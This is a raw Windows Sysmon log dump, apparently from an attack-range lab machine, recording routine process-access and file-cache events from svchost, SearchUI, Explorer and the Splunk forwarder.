12:02:31.306{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4
.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.306{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.306{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000006738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.306{266CAFBE-64C5-6064-A700-00000000AE01}43884064C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+b680|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000006737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.306{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.306{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.290{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.290{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.290{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.290{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.243{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\2\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].pngMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.243{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\2\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html2021-03-31 12:02:31.243 23542300x80000000000000006729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.243{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\2\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].htmlMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.243{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\2\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html2021-03-31 12:02:31.243 11241100x80000000000000006727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.243{266CAFBE-64C4-6064-9E00-00000000AE01}3120C:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\2\container.dat2021-03-31 12:02:31.243 11241100x80000000000000006726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt2021-03-31 12:02:31.228 23542300x80000000000000006725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt2021-03-31 12:02:31.228 11241100x80000000000000006723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt2021-03-31 12:02:31.228 23542300x80000000000000006722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt2021-03-31 12:02:31.228 11241100x80000000000000006720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt2021-03-31 12:02:31.228 23542300x80000000000000006719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt2021-03-31 12:02:31.228 11241100x80000000000000006717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.134{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt2021-03-31 12:02:31.134 23542300x80000000000000006716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.134{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.134{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt2021-03-31 12:02:31.134 11241100x80000000000000006714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.119{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt2021-03-31 12:02:31.119 23542300x80000000000000006713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.119{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.119{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt2021-03-31 12:02:31.119 23542300x80000000000000006711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.103{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD6F5F7E953B45D48C6A55BDF1DF0678,SHA256=D114F44F003A6739BA071229A3A4C36330DD416584AB06AF7596F13B6DAECFB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.072{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 